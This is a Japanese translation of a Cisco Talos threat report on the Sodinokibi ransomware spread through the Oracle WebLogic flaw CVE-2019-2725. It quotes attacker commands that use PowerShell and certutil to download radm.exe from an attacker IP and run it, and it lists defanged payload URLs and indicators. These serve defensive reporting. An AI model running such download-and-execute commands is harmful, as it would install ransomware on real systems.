最近、Oracle WebLogic で発見された脆弱性をエクスプロイトし、「Sodinokibi」と呼ばれるランサムウェアの新しい亜種をインストールするエクスプロイトが活発に起きています。Sodinokibi はユーザ ディレクトリ内のデータを暗号化し、シャドウ コピーのバックアップを削除してデータの回復を困難にします。Oracle は 4 月 26 日、まず通常のサイクル外でこの問題へのパッチを適用し、CVE-2019-2725
ランサムウェア攻撃の初期段階は、Oracle がアップデートをリリースする前日の 4 月 25 日に発生しました。この試みはサーバがエクスプロイト可能かどうかを確認することが狙いでした。
2019 年 4 月 25 日のアクティビティ。ランサムウェアがデプロイされる前の初期アクティビティを示す。
2019 年 4 月 26 日、攻撃者は別の脆弱なサーバへの HTTP 接続を確立し、Oracle WebLogic サーバの AsyncResponderService を要求しました。
4 月 26 日のアクティビティ。攻撃者は Sodinokibi ランサムウェアをダウンロードしている。
従来、ランサムウェアが取り込まれるには、ユーザによる操作、つまり、電子メールの添付ファイルを開く、悪意のあるリンクをクリックする、デバイス上でマルウェアを実行するなど、何らかの操作が必要でした。このケースでは攻撃者は単に Oracle WebLogic の脆弱性を利用して、攻撃対象のサーバに攻撃者が制御する IP アドレス 188.166.74[.]218 と 45.55.211[.]79 からランサムウェアのコピーをダウンロードさせていました。188.166.74 [.]218 の IP アドレスは、このランサムウェア攻撃とは関係のない、他の悪意のある 2 つのドメイン、arg0s-co[.]uk(フィッシング ドメイン
Cisco IR サービスおよび Talos は、130.61.54[.]136 を起源とする攻撃要求を確認しました。その HTTP POST 要求には cmd.exe 指令への引数、つまり、188.166.74[.]218 から「radm.exe」ファイルをダウンロードしてローカルに保存し、実行する PowerShell コマンドが含まれていました。
cmd /c powershell.exe wget http[:]//188.166.74[.]218/radm.exe -outfile %TEMP%/radm.exe&cmd.exe /c %TEMP%\\radm.exe
PowerShell に加え、ファイルをダウンロードさせる方法として攻撃者が巧みに certutil ユーティリティを cmd に渡していたことも確認しています。
cmd /c cmd.exe /c certutil.exe -urlcache -split -f http[:]//188.166.74[.]218/radm.exe %TEMP%/radm.exe&cmd.exe /c %TEMP%\\radm.exe
PowerShell および certutil コマンドでは「radm.exe」の他に次のような複数のファイル名が確認されています。
hxxp[:]//188.166.74[.]218/office.exe
hxxp[:]//188.166.74[.]218/radm.exe
hxxp[:]//188.166.74[.]218/untitled.exe
hxxp[:]//45.55.211[.]79/.cache/untitled.exe
このサンプルは Threat Grid
Web サイト「VirusTotal」は、71 個中 43 個の異なるエンジン
以下では、悪意のあるファイル「untitled.exe」が「cmd.exe」を使用して vssadmin.exe ユーティリティを実行していることが確認できます。このアクションは、ユーザがデータを簡単に回復できないようにする、ランサムウェアの一般的な手口です。デフォルトの Windows バックアップ メカニズム(別名「シャドウ コピー」)を削除して、バックアップから元のファイルを復元できないようにします。
このケースでは、身代金要求メッセージが被害者を Tor ネットワーク上の .onion サイト、または今年 3 月 31 日に登録されたパブリック ウェブ decryptor[.]top に導きます。Sodinokibi では、暗号化された各システムに個別の暗号化ファイル拡張子が表示されます。身代金要求メッセージのファイル名には、この拡張子がプレフィックスとして含まれています(例:88f2947s-HOW-TO-DECRYPT.txt)。
被害者のネットワーク内に Sodinokibi ランサムウェアを展開した後、攻撃者は約 8 時間後に CVE-2019-2725 のエクスプロイトを試行して追い打ちをかけます。ただし今回、攻撃者は Gandcrab v 5.2 を配布することを選択しています。攻撃者が別のランサムウェアを同じ標的に配布するのは奇妙なことです。Sodinokibi は新種でもあるため、前出の試みが失敗に終わったと感じた攻撃者が Gandcrab を配布して収益を得ようしたと考えるのが妥当でしょう。
この攻撃は、ゼロデイ攻撃を使用してランサムウェアを配布しているという点で注目されています。以前
今回のランサムウェア攻撃の被害者は、Cisco IR サービスでインシデント対応リテーナーを有効化し、インシデントの管理について即座にサポートとアドバイスを受けることができました。すぐに処置を講じたことで、重大なサービスの中断を回避できたと見られています。
Oracle WebLogic サーバが普及していることと、この脆弱性が容易にエクスプロイトできることから、Talos は CVE-2019-2725 に関連する攻撃が拡大することを想定したうえで以下に記す対策を行うことを推奨します。以下のような対策を取り、何重にも制御を施すことが、この種の攻撃の回避または阻止につながります。
配布 URL:
hxxp://188.166.74[.]218/office.exe
hxxp://188.166.74[.]218/radm.exe
hxxp://188.166.74[.]218/untitled.exe
hxxp://45.55.211[.]79/.cache/untitled.exe
攻撃者の IP:
130.61.54[.]136
攻撃者のドメイン:decryptor[.]top
本稿は 2019年4月30日に Talos Group
のブログに投稿された「Sodinokibi ransomware exploits WebLogic Server vulnerability 」の抄訳です。